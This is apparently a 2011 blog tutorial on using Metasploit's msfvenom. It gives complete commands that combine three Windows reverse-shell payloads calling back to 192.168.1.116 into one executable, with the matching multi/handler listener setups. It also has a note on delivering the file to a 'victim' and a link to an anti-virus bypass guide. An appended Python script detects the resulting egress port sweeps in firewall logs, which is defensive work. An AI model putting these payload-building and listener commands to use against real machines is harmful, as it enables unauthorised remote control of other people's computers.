Sunday, November 27, 2011

Binary Mischief With Msfencode

Good day Good Sirs
Today is a quick example of using msfencode. This is strictly the way I use it; there are more than likely better ways and methods, but this works for me. Hopefully you enjoy it. So here goes...

All of you may have heard of and/or used msfpayload and msfencode. But what you may not be aware of is msfvenom, which is basically a replacement for the two. As said before, this is only the way I use it. So first things first: by running msfvenom with no arguments, you are shown the help information. This is shown below.

Now as you see, there are many options. I personally first decide what payload I'm going to use, by opening another terminal and running msfpayload -l | grep "whatever you're looking for". So for instance: ./msfpayload -l | grep windows/meterpreter/reverse, which would give you output as seen below.

Now as you can see, we have a few payloads to choose from. I will be using windows/meterpreter/reverse_tcp.

So moving back to the terminal with msfvenom, I would use the following command; the options are explained below.
./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.116 LPORT=4444 -f raw > /tmp/pay1

Command explanation:
-p: chosen payload
LHOST=: the listening host
LPORT=: the listening port
-f: the format that you want your payload to be output as
raw: the reason I have used this is that I intend to add this payload along with another one, so we don't want it wrapped in an executable just yet. Basically it stays as shellcode for the time being.
> /tmp/pay1: telling msfvenom where to store our payload for later use.

Now go on to decide what your next payload will be. So refer back to the msfpayload terminal and choose your next payload. I will be using windows/shell/reverse_tcp,
so my next command within the msfvenom terminal would be as follows.
./msfvenom -p windows/shell/reverse_tcp -f raw LHOST=192.168.1.116 LPORT=4443 -c /tmp/pay1 -k > /tmp/pay2

Command explanation:
-p: the payload to use
-f: the format to keep the payload in
LHOST=: the listening host
LPORT=: the listening port
-c: telling msfvenom that you want to combine extra shellcode with the current payload. Ensure you give the full path to the shellcode "payload" to add.
-k: to keep the payload working by running it within another thread.

Now decide on a third payload. I do this by referring back to my msfpayload terminal and picking from there. I will be using windows/meterpreter/reverse_tcp_allports, so the command will look like the one below. Remember to pay attention, because now we will be adding the payloads together and having the format be an executable.

./msfvenom -p windows/meterpreter/reverse_tcp_allports -f exe LHOST=192.168.1.116 LPORT=2 -c /tmp/pay2 > /tmp/pay3.exe

Command explanation:
-p: the payload to be used
-f: the format for your payload
LHOST=: the listening host
LPORT=: the listening port
-c: telling msfvenom to add some shellcode. Be sure to give the full path to the shellcode you want to add.

Below is a picture of all three commands in succession.

Now you have three payloads in one, so you will need to set up three listeners. What I do is open up three terminals and load msfconsole using the following commands:
cd /pentest/exploits/framework
./msfconsole

Just doing that three times will get you three different msfconsole sessions. Now to set up the listeners. Pick a terminal and do the following.
use exploit/multi/handler

Now tell it what to listen for. Our first payload had the following options, so just input these with the following commands:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.116 <---- or whatever your LHOST will be
set LPORT 4444 <---- or whatever your LPORT will be
show options <---- just to check all your options are set correctly
exploit <---- if all options were set correctly, the exploit command will start your listener

Now a new msfconsole session for our second payload, using the following commands (again after use exploit/multi/handler):
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.1.116 <---- or whatever your LHOST will be
set LPORT 4443 <---- or whatever your LPORT will be
show options <---- just to check all your options are set correctly
exploit <---- if all options were set correctly, the exploit command will start your listener

Now on to listener three. In your third msfconsole session, input the following.
set PAYLOAD windows/meterpreter/reverse_tcp_allports
set LHOST 192.168.1.116 <---- or whatever your LHOST will be
set LPORT 2 <---- or whatever your LPORT will be
show options <---- just to check all your options are set correctly
exploit <---- if all options were set correctly, the exploit command will start your listener

Now all that's left is to get your executable over to your victim. This would take imagination in a real-world pentest, but since I'm only testing, I simply copy it over to my web server and download the executable to my virtual machine, then run it. If all went well, you will get three separate shells. This could certainly be useful in situations where you want to send a shell to different machines, i.e. you could have multiple LHOSTs, or if you're not sure what type of egress rulesets are in place. All in all, it's an amazing feature. Now notice, I didn't do any encoding to bypass AV. That's because I will send you to a great write-up on bypassing anti-virus using a similar method. So if you take my "guide by example" and the following guide from http://www.fuzzysecurity.com/tutorials/3.html, you should see some great results. I hope you enjoyed this quickly put together post. Please feel free to tell me what you'd like to see next. As always, goodnight and good luck.

http://www.fuzzysecurity.com/tutorials/3.html <---- check this out for encoding and bypassing anti-virus
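From the defender's side, the egress-ruleset point above is also what makes the third payload noisy: the reverse_tcp_allports stager walks outbound ports upward from LPORT (here LPORT=2) until one connects, so a host that is blocked will leave a run of denied connections to one destination on consecutive ports in the egress firewall log. The script below is an added example, not code from the original post; it assumes a constructed log format of `<ISO time> ALLOW|DENY <src> -> <dst>:<dport>` (the sample lines are made up) and flags any source/destination pair that touches many distinct ports inside a short window, reporting whether those ports form a contiguous run.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterator, List, Tuple

# Constructed sample egress-firewall log (not from the original post).
# 10.0.0.5 is denied on 25 consecutive outbound ports (2..26) to one address,
# which is the footprint an allports stager leaves when egress filtering blocks
# it; the remaining lines are ordinary traffic that must not be flagged.
SAMPLE_LOG = "\n".join(
    [f"2011-11-27T22:10:{i:02d} DENY 10.0.0.5 -> 192.168.1.116:{2 + i}" for i in range(25)]
    + [
        "2011-11-27T22:10:03 ALLOW 10.0.0.7 -> 93.184.216.34:443",
        "2011-11-27T22:10:09 ALLOW 10.0.0.5 -> 93.184.216.34:80",
        "2011-11-27T22:11:40 DENY 10.0.0.9 -> 198.51.100.20:25",
    ]
)

# Assumed (constructed) line layout: "<ISO time> ALLOW|DENY <src> -> <dst>:<dport>"
LINE_RE = re.compile(r"^(\S+) (ALLOW|DENY) (\S+) -> (\S+):(\d+)$")


def parse_log(log_text: str) -> Iterator[Tuple[float, str, str, str, int]]:
    """Yield (epoch_seconds, action, src, dst, dport); lines that do not match are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, action, src, dst, dport = m.groups()
        yield datetime.fromisoformat(ts).timestamp(), action, src, dst, int(dport)


def find_port_sweeps(log_text: str, min_ports: int = 10,
                     window_seconds: float = 60.0) -> List[Dict]:
    """Return one finding per (src, dst) pair that reaches at least min_ports
    distinct destination ports within any window_seconds-long window.

    A contiguous run of ports (2, 3, 4, ...) is the allports-stager shape;
    a scattered set is more likely a scanner or an unrelated burst."""
    by_pair: Dict[Tuple[str, str], List[Tuple[float, int]]] = defaultdict(list)
    for ts, _action, src, dst, dport in parse_log(log_text):
        by_pair[(src, dst)].append((ts, dport))

    findings: List[Dict] = []
    for (src, dst), events in by_pair.items():
        events.sort()
        best: set = set()
        lo = 0
        # Two-pointer sliding window over the time-ordered events of this pair.
        for hi in range(len(events)):
            while events[hi][0] - events[lo][0] > window_seconds:
                lo += 1
            ports = {p for _, p in events[lo:hi + 1]}
            if len(ports) > len(best):
                best = ports
        if len(best) < min_ports:
            continue
        ordered = sorted(best)
        steps = [b - a for a, b in zip(ordered, ordered[1:])]
        findings.append({
            "src": src,
            "dst": dst,
            "distinct_ports": len(ordered),
            "first_port": ordered[0],
            "last_port": ordered[-1],
            "contiguous": all(s == 1 for s in steps),
        })
    return findings


if __name__ == "__main__":
    for finding in find_port_sweeps(SAMPLE_LOG):
        print(finding)
```

Run against the constructed sample it reports a single contiguous sweep from 10.0.0.5 to 192.168.1.116 over ports 2 through 26; raising min_ports above 25 makes it go quiet. The threshold and window are deliberately parameters, since a real egress log mixes in legitimate bursts that a fixed number would either miss or drown in.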
